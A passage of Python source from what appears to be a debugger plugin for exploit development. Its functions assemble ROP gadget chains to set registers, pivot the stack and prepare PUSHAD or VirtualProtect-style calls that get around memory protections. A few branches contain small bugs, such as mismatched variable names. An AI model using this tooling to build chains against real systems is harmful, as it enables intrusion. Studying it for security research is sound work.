movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound:
# can we do this using add/sub via another register ?
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop "+ fromreg in suggestions and "add value to " + fromreg in suggestions:
# check each value & see if delta meets pointer criteria
#dbg.log("move %s into %s" % (fromreg,reg))
for addinstr in suggestions["add value to " + fromreg]:
if not gadgetfound:
theinstr = interestinggadgets[addinstr][3:len(interestinggadgets[addinstr])]
#dbg.log("%s" % theinstr)
instrparts = theinstr.split("#")
totalvalue = 0
#gadget might contain multiple add/sub instructions
for indivinstr in instrparts:
instrvalueparts = indivinstr.split(',')
if len(instrvalueparts) > 1:
# only look at real values
if isHexValue(instrvalueparts[1].rstrip()):
thisval = hexStrToInt(instrvalueparts[1])
if instrvalueparts[0].lstrip().startswith("ADD"):
totalvalue += thisval
if instrvalueparts[0].lstrip().startswith("SUB"):
totalvalue -= thisval
# subtract totalvalue from target value
if totalvalue > 0:
deltaval = value - totalvalue
if deltaval < 0:
deltaval = 0xffffffff + deltaval + 1
deltavalhex = toHex(deltaval)
if meetsCriteria(MnPointer(deltaval),criteria):
#dbg.log(" Instruction : %s, Delta : %s, To pop in reg : %s" % (theinstr,toHex(totalvalue),deltavalhex),highlight=1)
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([deltaval,"put delta into " + fromreg + " (-> put 0x" + toHex(value) + " into " + reg + ")",0])
junksize = getJunk(interestinggadgets[addinstr])
putchain.append([addinstr,"",junksize])
movptr = getShortestGadget(suggestions["move "+fromreg + " -> " + reg])
junksize = getJunk(interestinggadgets[movptr])
putchain.append([movptr,"",junksize])
gadgetfound = True
if not gadgetfound:
if "pop " + reg in suggestions and "neg "+reg in suggestions and "dec "+reg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc += 1
if toinc > 250:
break
if toinc <= 250:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
cnt = 0
decptr = getShortestGadget(suggestions["dec "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
junksize = getJunk(interestinggadgets[decptr])
while cnt < toinc:
putchain.append([decptr,"",junksize])
cnt += 1
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions and "dec "+fromreg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc += 1
if toinc > 250:
break
if toinc <= 250:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
cnt = 0
decptr = getShortestGadget(suggestions["dec "+fromreg])
putchain.append([negptr,"",junksize])
junksize = getJunk(interestinggadgets[decptr])
while cnt < toinc:
putchain.append([decptr,"",junksize])
cnt += 1
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "pop " + reg in suggestions and "neg "+reg in suggestions and "inc "+reg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc -= 1
if toinc < -250:
break
if toinc > -250:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
incptr = getShortestGadget(suggestions["inc "+reg])
junksize = getJunk(interestinggadgets[incptr])
while toinc < 0:
putchain.append([incptr,"",junksize])
toinc += 1
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions and "inc "+fromreg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc -= 1
if toinc < -250:
break
if toinc > -250:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,""])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value)])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
decptr = getShortestGadget(suggestions["inc "+fromreg])
junksize = getJunk(interestinggadgets[incptr])
while toinc < 0 :
putchain.append([incptr,"",junksize])
toinc += 1
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "add value to " + reg in suggestions and "pop " + reg in suggestions:
addtypes = ["ADD","ADC","XOR", "SUB"]
for addtype in addtypes:
for ptrs in suggestions["add value to " + reg]:
thisinstr = interestinggadgets[ptrs]
thisparts = thisinstr.split("#")
addinstr = thisparts[1].lstrip().split(",")
if thisparts[1].startswith(addtype):
if addtype == "ADD" or addtype == "ADC":
addvalue = hexStrToInt(addinstr[1])
delta = value - addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if addtype == "XOR":
delta = hexStrToInt(addinstr[1]) ^ value
if addtype == "SUB":
addvalue = hexStrToInt(addinstr[1])
delta = value + addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if meetsCriteria(MnPointer(delta),criteria):
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([delta,"Diff to desired value",0])
junksize = getJunk(interestinggadgets[ptrs])
putchain.append([ptrs,"",junksize])
gadgetfound = True
break
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "add value to " + fromreg in suggestions and "pop " + fromreg in suggestions:
addtypes = ["ADD","ADC","XOR","SUB"]
for addtype in addtypes:
for ptrs in suggestions["add value to " + fromreg]:
thisinstr = interestinggadgets[ptrs]
thisparts = thisinstr.split("#")
addinstr = thisparts[1].lstrip().split(",")
if thisparts[1].startswith(addtype):
if addtype == "ADD" or addtype == "ADC":
addvalue = hexStrToInt(addinstr[1])
delta = value - addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if addtype == "XOR":
delta = hexStrToInt(addinstr[1]) ^ value
if addtype == "SUB":
addvalue = hexStrToInt(addinstr[1])
delta = value + addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
#dbg.log("0x%s : %s, delta : 0x%s" % (toHex(ptrs),thisinstr,toHex(delta)))
if meetsCriteria(MnPointer(delta),criteria):
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([delta,"Diff to desired value",0])
junksize = getJunk(interestinggadgets[ptrs])
putchain.append([ptrs,"",junksize])
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "inc " + reg in suggestions and value <= 64:
cnt = 0
# can we clear the reg ?
clearsteps = clearReg(reg,suggestions,interestinggadgets)
for cstep in clearsteps:
putchain.append([cstep[0],cstep[1],cstep[2]])
# inc
incptr = getShortestGadget(suggestions["inc "+reg])
junksize = getJunk(interestinggadgets[incptr])
while cnt < value:
putchain.append([incptr,"",junksize])
cnt += 1
gadgetfound = True
if not gadgetfound:
putchain.append([0,"[-] Unable to find gadget to put " + toHex(value) + " into " + reg,0])
return putchain
def getGadgetMoveRegToReg(fromreg,toreg,suggestions,interestinggadgets):
movechain = []
movetype = "move " + fromreg + " -> " + toreg
if movetype in suggestions:
moveptr = getShortestGadget(suggestions[movetype])
moveinstr = interestinggadgets[moveptr].lstrip()
if moveinstr.startswith("# XOR") or moveinstr.startswith("# OR") or moveinstr.startswith("# AD"):
clearchain = clearReg(toreg,suggestions,interestinggadgets)
for cc in clearchain:
movechain.append([cc[0],cc[1],cc[2]])
junksize = getJunk(interestinggadgets[moveptr])
movechain.append([moveptr,"",junksize])
else:
movetype1 = "xor " + fromreg + " -> " + toreg
movetype2 = "xor " + toreg + " -> " + fromreg
if movetype1 in suggestions and movetype2 in suggestions:
moveptr1 = getShortestGadget(suggestions[movetype1])
junksize = getJunk(interestinggadgets[moveptr1])
movechain.append([moveptr1,"",junksize])
moveptr2 = getShortestGadget(suggestions[movetype2])
junksize = getJunk(interestinggadgets[moveptr2])
movechain.append([moveptr2,"",junksize])
return movechain
def clearReg(reg,suggestions,interestinggadgets):
clearchain = []
clearfound = False
if not "clear " + reg in suggestions:
if not "inc " + reg in suggestions or not "pop " + reg in suggestions:
# maybe it will work using a move from another register
for inctype in suggestions:
if inctype.startswith("inc"):
increg = inctype.split(" ")[1]
iptr = getShortestGadget(suggestions["inc " + increg])
for movetype in suggestions:
if movetype == "move " + increg + " -> " + reg and "pop " + increg in suggestions:
moveptr = getShortestGadget(suggestions[movetype])
moveinstr = interestinggadgets[moveptr].lstrip()
if not(moveinstr.startswith("# XOR") or moveinstr.startswith("# OR") or moveinstr.startswith("# AD")):
#kewl
pptr = getShortestGadget(suggestions["pop " + increg])
junksize = getJunk(interestinggadgets[pptr])-4
clearchain.append([pptr,"",junksize])
clearchain.append([0xffffffff," ",0])
junksize = getJunk(interestinggadgets[iptr])
clearchain.append([iptr,"",junksize])
junksize = getJunk(interestinggadgets[moveptr])
clearchain.append([moveptr,"",junksize])
clearfound = True
break
if not clearfound:
clearchain.append([0,"[-] Unable to find a gadget to clear " + reg,0])
else:
#pop FFFFFFFF into reg, then do inc reg => 0
pptr = getShortestGadget(suggestions["pop " + reg])
junksize = getJunk(interestinggadgets[pptr])-4
clearchain.append([pptr,"",junksize])
clearchain.append([0xffffffff," ",0])
iptr = getShortestGadget(suggestions["inc " + reg])
junksize = getJunk(interestinggadgets[iptr])
clearchain.append([iptr,"",junksize])
else:
shortest_clear = getShortestGadget(suggestions["clear " + reg])
junksize = getJunk(interestinggadgets[shortest_clear])
clearchain.append([shortest_clear,"",junksize])
return clearchain
def getGadgetValueToReg(reg,value,suggestions,interestinggadgets):
negfound = False
blocktxt = ""
blocktxt2 = ""
tonegate = 4294967296 - value
nregs = ["eax","ebx","ecx","edx","edi"]
junksize = 0
junk2size = 0
negateline = " 0x" + toHex(tonegate)+", # value to negate, target value : 0x" + toHex(value) + ", target reg : " + reg +"\n"
if "neg " + reg in suggestions:
negfound = True
negptr = getShortestGadget(suggestions["neg " + reg])
if "pop "+reg in suggestions:
pptr = getShortestGadget(suggestions["pop " + reg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += negateline
junk2size = getJunk(interestinggadgets[pptr])-4
else:
blocktxt2 += " 0x????????,# find a way to pop the next value into "+thisreg+"\n"
blocktxt2 += negateline
blocktxt2 += " 0x" + toHex(negptr)+", "+interestinggadgets[negptr].strip()+" ("+MnPointer(negptr).belongsTo()+")\n"
junksize = getJunk(interestinggadgets[negptr])-4
if not negfound:
nregs.remove(reg)
for thisreg in nregs:
if "neg "+ thisreg in suggestions and not negfound:
blocktxt2 = ""
junk2size = 0
negfound = True
#get pop first
if "pop "+thisreg in suggestions:
pptr = getShortestGadget(suggestions["pop " + thisreg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += negateline
junk2size = getJunk(interestinggadgets[pptr])-4
else:
blocktxt2 += " 0x????????,# find a way to pop the next value into "+thisreg+"\n"
blocktxt2 += negateline
negptr = getShortestGadget(suggestions["neg " + thisreg])
blocktxt2 += " 0x" + toHex(negptr)+", "+interestinggadgets[negptr].strip()+" ("+MnPointer(negptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[negptr])-4
#now move it to reg
if "move " + thisreg + " -> " + reg in suggestions:
bptr = getShortestGadget(suggestions["move " + thisreg + " -> " + reg])
if interestinggadgets[bptr].strip().startswith("# ADD"):
if not "clear " + reg in suggestions:
# other way to clear reg, using pop + inc ?
if not "inc " + reg in suggestions or not "pop " + reg in suggestions:
blocktxt2 += " 0x????????, # find pointer to clear " + reg+"\n"
else:
#pop FFFFFFFF into reg, then do inc reg => 0
pptr = getShortestGadget(suggestions["pop " + reg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += " 0xffffffff, # pop value into " + reg + "\n"
blocktxt2 += createJunk(getJunk(interestinggadgets[pptr])-4)
iptr = getShortestGadget(suggestions["inc " + reg])
blocktxt2 += " 0x" + toHex(iptr)+", "+interestinggadgets[iptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
junksize += getJunk(interestinggadgets[iptr])
else:
clearptr = getShortestGadget(suggestions["empty " + reg])
blocktxt2 += " 0x" + toHex(clearptr)+", "+interestinggadgets[clearptr].strip()+" ("+MnPointer(clearptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[clearptr])-4
blocktxt2 += " 0x" + toHex(bptr)+", "+interestinggadgets[bptr].strip()+" ("+MnPointer(bptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[bptr])-4
else:
negfound = False
if negfound:
blocktxt += blocktxt2
else:
blocktxt = ""
junksize = junksize + junk2size
return blocktxt,junksize
def getOffset(instructions):
offset = 0
instrparts = instructions.split("#")
retpart = instrparts[len(instrparts)-1].strip()
retparts = retpart.split(" ")
if len(retparts) > 1:
offset = hexStrToInt(retparts[1])
return offset
def getJunk(instructions):
junkpop = instructions.count("POP ") * 4
junkpush = instructions.count("PUSH ") * -4
junkpushad = instructions.count("PUSHAD ") * -32
junkpopad = instructions.count("POPAD") * 32
junkinc = instructions.count("INC ESP") * 1
junkdec = instructions.count("DEC ESP") * -1
junkesp = 0
if instructions.find("ADD ESP,") > -1:
instparts = instructions.split("#")
for part in instparts:
thisinstr = part.strip()
if thisinstr.startswith("ADD ESP,"):
value = thisinstr.split(",")
junkesp += hexStrToInt(value[1])
if instructions.find("SUB ESP,") > -1:
instparts = instructions.split("#")
for part in instparts:
thisinstr = part.strip()
if thisinstr.startswith("SUB ESP,"):
value = thisinstr.split(",")
junkesp -= hexStrToInt(value[1])
junk = junkpop + junkpush + junkpopad + junkpushad + junkesp
return junk
def createJunk(size,message="filler (compensate)",alignsize=0):
bytecnt = 0
dword = 0
junktxt = ""
while bytecnt < size:
dword = 0
junktxt += " 0x"
while dword < 4 and bytecnt < size :
junktxt += "41"
dword += 1
bytecnt += 1
junktxt += ","
junktxt += toSize("",alignsize + 4 - dword)
junktxt += " # "+message+"\n"
return junktxt
def getShortestGadget(chaintypedict):
shortest = 100
shortestptr = 0
shortestinstr = "A" * 1000
thischaindict = chaintypedict.copy()
#shuffle dict so returning ptrs would be different each time
while thischaindict:
typeptr, thisinstr = random.choice(thischaindict.items())
if thisinstr.startswith("# XOR") or thisinstr.startswith("# OR") or thisinstr.startswith("# AD"):
thisinstr += " " # make sure we don prefer MOV or XCHG
thiscount = thisinstr.count("#")
thischaindict.pop(typeptr)
if thiscount < shortest:
shortest = thiscount
shortestptr = typeptr
shortestinstr = thisinstr
else:
if thiscount == shortest:
if len(thisinstr) < len(shortestinstr):
shortest = thiscount
shortestptr = typeptr
shortestinstr = thisinstr
return shortestptr
def isInterestingGadget(instructions):
if isAsciiString(instructions):
interesting = [
"POP E", "XCHG E", "LEA E", "PUSH E", "XOR E", "AND E", "NEG E",
"OR E", "ADD E", "SUB E", "INC E", "DEC E", "POPAD", "PUSHAD",
"SUB A", "ADD A", "NOP", "ADC E",
"SUB BH", "SUB BL", "ADD BH", "ADD BL",
"SUB CH", "SUB CL", "ADD CH", "ADD CL",
"SUB DH", "SUB DL", "ADD DH", "ADD DL",
"MOV E", "CLC", "CLD", "FS:", "FPA", "TEST "
]
notinteresting = [ "MOV ESP,EBP", "LEA ESP" ]
subregs = ["EAX","ECX","EDX","EBX","EBP","ESI","EDI"]
regs = dbglib.Registers32BitsOrder
individual = instructions.split("#")
cnt = 0
allgood = True
toskip = False
while (cnt < len(individual)-1) and allgood: # do not check last one, which is the ending instruction
thisinstr = individual[cnt].strip().upper()
if thisinstr != "":
toskip = False
foundinstruction = False
for notinterest in notinteresting:
if thisinstr.find(notinterest) > -1:
toskip= True
if not toskip:
for interest in interesting:
if thisinstr.find(interest) > -1:
foundinstruction = True
if not foundinstruction:
#check the conditional instructions
if thisinstr.find("MOV DWORD PTR DS:[E") > -1:
thisinstrparts = thisinstr.split(",")
if len(thisinstrparts) > 1:
if thisinstrparts[1] in regs:
foundinstruction = True
# other exceptions - don't combine ADD BYTE or ADD DWORD with XCHG EAX,ESI - EAX may not be writeable
#if instructions.strip().startswith("# XCHG") and (thisinstr.find("ADD DWORD") > -1 or thisinstr.find("ADD BYTE") > -1) and not instructions.strip().startswith("# XCHG EAX,ESI") :
# allow - tricky case, but sometimes needed
# foundinstruction = True
allgood = foundinstruction
else:
allgood = False
cnt += 1
return allgood
return False
def isInterestingJopGadget(instructions):
interesting = [
"POP E", "XCHG E", "LEA E", "PUSH E", "XOR E", "AND E", "NEG E",
"OR E", "ADD E", "SUB E", "INC E", "DEC E", "POPAD", "PUSHAD",
"SUB A", "ADD A", "NOP", "ADC E",
"SUB BH", "SUB BL", "ADD BH", "ADD BL",
"SUB CH", "SUB CL", "ADD CH", "ADD CL",
"SUB DH", "SUB DL", "ADD DH", "ADD DL",
"MOV E", "CLC", "CLD", "FS:", "FPA"
]
notinteresting = [ "MOV ESP,EBP", "LEA ESP" ]
regs = dbglib.Registers32BitsOrder
individual = instructions.split("#")
cnt = 0
allgood = True
popfound = False
toskip = False
# what is the jmp instruction ?
lastinstruction = individual[len(individual)-1].replace("[","").replace("+"," ").replace("]","").strip()
jmp = lastinstruction.split(' ')[1].strip().upper().replace(" ","")
regs = ["EAX","EBX","ECX","EDX","ESI","EDI","EBP","ESP"]
regs.remove(jmp)
if jmp != "ESP":
if instructions.find("POP "+jmp) > -1:
popfound=True
else:
for reg in regs:
poploc = instructions.find("POP "+reg)
if (poploc > -1):
if (instructions.find("MOV "+reg+","+jmp) > poploc) or (instructions.find("XCHG "+reg+","+jmp) > poploc) or (instructions.find("XCHG "+jmp+","+reg) > poploc):
popfound = True
allgood = popfound
return allgood
def readGadgetsFromFile(filename):
"""
Reads a mona/msf generated rop file
Arguments :
filename - the full path + filename of the source file
Return :
dictionary containing the gadgets (grouped by ending type)
"""
readopcodes = {}
srcfile = open(filename,"rb")
content = srcfile.readlines()
srcfile.close()
msffiledetected = False
#what kind of file do we have
for thisLine in content:
if thisLine.find("mod:") > -1 and thisLine.find("ver:") > -1 and thisLine.find("VA") > -1:
msffiledetected = True
break
if msffiledetected:
dbg.log("[+] Importing MSF ROP file...")
addrline = 0
ending = ""
thisinstr = ""
thisptr = ""
for thisLine in content:
if thisLine.find("[addr:") == 0:
thisLineparts = thisLine.split("]")
if addrline == 0:
thisptr = hexStrToInt(thisLineparts[0].replace("[addr: ",""))
thisLineparts = thisLine.split(" ")
thisinstrpart = thisLineparts[len(thisLineparts)-1].upper().strip()
if thisinstrpart != "":
thisinstr += " # " + thisinstrpart
ending = thisinstrpart
addrline += 1
else:
addrline = 0
if thisptr != "" and ending != "" and thisinstr != "":
if not ending in readopcodes:
readopcodes[ending] = [thisptr,thisinstr]
else:
readopcodes[ending] += ([thisptr,thisinstr])
thisptr = ""
ending = ""
thisinstr = ""
else:
dbg.log("[+] Importing Mona legacy ROP file...")
for thisLine in content:
if isAsciiString(thisLine.replace("\r","").replace("\n","")):
refpointer,instr = splitToPtrInstr(thisLine)
if refpointer != -1:
#get ending
instrparts = instr.split("#")
ending = instrparts[len(instrparts)-1]
if not ending in readopcodes:
readopcodes[ending] = [refpointer,instr]
else:
readopcodes[ending] += ([refpointer,instr])
return readopcodes
def isGoodGadgetPtr(gadget,criteria):
if gadget in CritCache:
return CritCache[gadget]
else:
gadgetptr = MnPointer(gadget)
status = meetsCriteria(gadgetptr,criteria)
CritCache[gadget] = status
return status
def getStackPivotDistance(gadget,distance=0):
offset = 0
distance_str = str(distance).lower()
mindistance = 0
maxdistance = 0
if "," not in distance_str:
# only mindistance
maxdistance = 99999999
mindistance = to_int(distance_str)
else:
mindistance, maxdistance = distance_str.split(",")
mindistance = to_int(mindistance)
maxdistance = to_int(maxdistance)
gadgets = filter(lambda x: x.strip(), gadget.split(" # "))
for g in gadgets:
if "ADD ESP," in g:
offset += hexStrToInt(g.split(",")[1])
elif "SUB ESP," in g:
offset += hexStrToInt(g.split(",")[1])
elif "INC ESP" in g:
offset += 1
elif "DEC ESP" in g:
offset -= 1
elif "POP " in g:
offset += 4
elif "PUSH " in g:
offset -= 4
elif "POPAD" in g:
offset += 32
elif "PUSHAD" in g:
offset -= 32
elif ("DWORD PTR" in g or "[" in g) and "FS" not in g:
return 0
if mindistance <= offset and offset <= maxdistance:
return offset
else:
return 0
def isGoodGadgetInstr(instruction):
if isAsciiString(instruction):
forbidden = [
"???", "LEAVE", "JMP ", "CALL ", "JB ", "JL ", "JE ", "JNZ ",
"JGE ", "JNS ","SAL ", "LOOP", "LOCK", "BOUND", "SAR", "IN ",
"OUT ", "RCL", "RCR", "ROL", "ROR", "SHL", "SHR", "INT", "JECX",
"JNP", "JPO", "JPE", "JCXZ", "JA", "JB", "JNA", "JNB", "JC", "JNC",
"JG", "JLE", "MOVS", "CMPS", "SCAS", "LODS", "STOS", "REP", "REPE",
"REPZ", "REPNE", "REPNZ", "LDS", "FST", "FIST", "FMUL", "FDIVR",
"FSTP", "FST", "FLD", "FDIV", "FXCH", "JS ", "FIDIVR", "SBB",
"SALC", "ENTER", "CWDE", "FCOM", "LAHF", "DIV", "JO", "OUT", "IRET",
"FILD", "RETF","HALT","HLT","AAM","FINIT","INT3"
]
for instr in forbidden:
if instruction.upper().find(instr) > -1:
return False
return True
return False
def isGoodJopGadgetInstr(instruction):
if isAsciiString(instruction):
forbidden = [
"???", "LEAVE", "RETN", "CALL ", "JB ", "JL ", "JE ", "JNZ ",
"JGE ", "JNS ","SAL ", "LOOP", "LOCK", "BOUND", "SAR", "IN ",
"OUT ", "RCL", "RCR", "ROL", "ROR", "SHL", "SHR", "INT", "JECX",
"JNP", "JPO", "JPE", "JCXZ", "JA", "JB", "JNA", "JNB", "JC", "JNC",
"JG", "JLE", "MOVS", "CMPS", "SCAS", "LODS", "STOS", "REP", "REPE",
"REPZ", "REPNE", "REPNZ", "LDS", "FST", "FIST", "FMUL", "FDIVR",
"FSTP", "FST", "FLD", "FDIV", "FXCH", "JS ", "FIDIVR", "SBB",
"SALC", "ENTER", "CWDE", "FCOM", "LAHF", "DIV", "JO", "OUT", "IRET",
"FILD", "RETF","HALT","HLT","AAM","FINIT"
]
for instr in forbidden:
if instruction.upper().find(instr) > -1:
return False
return True
return False
def isGadgetEnding(instruction,endings,verbosity=False):
for ending in endings:
if instruction.lower().find(ending.lower()) > -1:
return True
return False
def getRopSuggestion(ropchains,allchains):
suggestions={}
# pushad
# ======================
regs = ["EAX","EBX","ECX","EDX","EBP","ESI","EDI"]
pushad_allowed = [ "INC ","DEC ","OR ","XOR ","LEA ","ADD ","SUB ", "PUSHAD", "RETN ", "NOP", "POP ","PUSH EAX","PUSH EDI","ADC ","FPATAN","MOV E" , "TEST ", "CMP "]
for r in regs:
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[ESP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[ESP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[ESI") #virtualprotect
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[ESI") #virtualprotect
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[EBP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[EBP") #stack
for r2 in regs:
pushad_allowed.append("MOV "+r+","+r2)
pushad_allowed.append("XCHG "+r+","+r2)
pushad_allowed.append("LEA "+r+","+r2)
pushad_notallowed = ["POP ESP","POPAD","PUSH ESP","MOV ESP","ADD ESP", "INC ESP","DEC ESP","XOR ESP","LEA ESP","SS:","DS:"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find("PUSHAD") == 2:
# does chain only contain allowed instructions
# one pop is allowed, as long as it's not pop esp
# push edi and push eax are allowed too (ropnop)
if gadgetinstructions.count("POP ") < 2 and suggestedGadgetCheck(gadgetinstructions,pushad_allowed,pushad_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not "pushad" in suggestions:
suggestions["pushad"] = toadd
else:
suggestions["pushad"] = mergeOpcodes(suggestions["pushad"],toadd)
# pick up a pointer
# =========================
pickedupin = []
resulthash = ""
allowedpickup = True
for r in regs:
for r2 in regs:
pickup_allowed = ["NOP","RETN ","INC ","DEC ","OR ","XOR ","MOV ","LEA ","ADD ","SUB ","POP","ADC ","FPATAN", "TEST ", "CMP "]
pickup_target = []
pickup_notallowed = []
pickup_allowed.append("MOV "+r+",DWORD PTR SS:["+r2+"]")
pickup_allowed.append("MOV "+r+",DWORD PTR DS:["+r2+"]")
pickup_target.append("MOV "+r+",DWORD PTR SS:["+r2+"]")
pickup_target.append("MOV "+r+",DWORD PTR DS:["+r2+"]")
pickup_notallowed = ["POP "+r, "MOV "+r+",E", "LEA "+r+",E", "MOV ESP", "XOR ESP", "LEA ESP", "MOV DWORD PTR", "DEC ESP"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
allowedpickup = False
for allowed in pickup_target:
if gadgetinstructions.find(allowed) == 2 and gadgetinstructions.count("DWORD PTR") == 1:
allowedpickup = True
break
if allowedpickup:
if suggestedGadgetCheck(gadgetinstructions,pickup_allowed,pickup_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
resulthash = "pickup pointer into "+r.lower()
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
if not r in pickedupin:
pickedupin.append(r)
if len(pickedupin) == 0:
for r in regs:
for r2 in regs:
pickup_allowed = ["NOP","RETN ","INC ","DEC ","OR ","XOR ","MOV ","LEA ","ADD ","SUB ","POP", "ADC ","FPATAN", "TEST ", "CMP "]
pickup_target = []
pickup_notallowed = []
pickup_allowed.append("MOV "+r+",DWORD PTR SS:["+r2+"+")
pickup_allowed.append("MOV "+r+",DWORD PTR DS:["+r2+"+")
pickup_target.append("MOV "+r+",DWORD PTR SS:["+r2+"+")
pickup_target.append("MOV "+r+",DWORD PTR DS:["+r2+"+")
pickup_notallowed = ["POP "+r, "MOV "+r+",E", "LEA "+r+",E", "MOV ESP", "XOR ESP", "LEA ESP", "MOV DWORD PTR"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
allowedpickup = False
for allowed in pickup_target:
if gadgetinstructions.find(allowed) == 2 and gadgetinstructions.count("DWORD PTR") == 1:
allowedpickup = True
break
if allowedpickup:
if suggestedGadgetCheck(gadgetinstructions,pickup_allowed,pickup_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
resulthash = "pickup pointer into "+r.lower()
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
if not r in pickedupin:
pickedupin.append(r)
# move pointer into another pointer
# =================================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# if we didn't find any, expand the search
if not ("move " + reg + " -> " + reg2).lower() in suggestions:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
reg2 = "ESP" #special case
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "MOV ", "XCHG ", "ADC ", "TEST ", "CMP "]
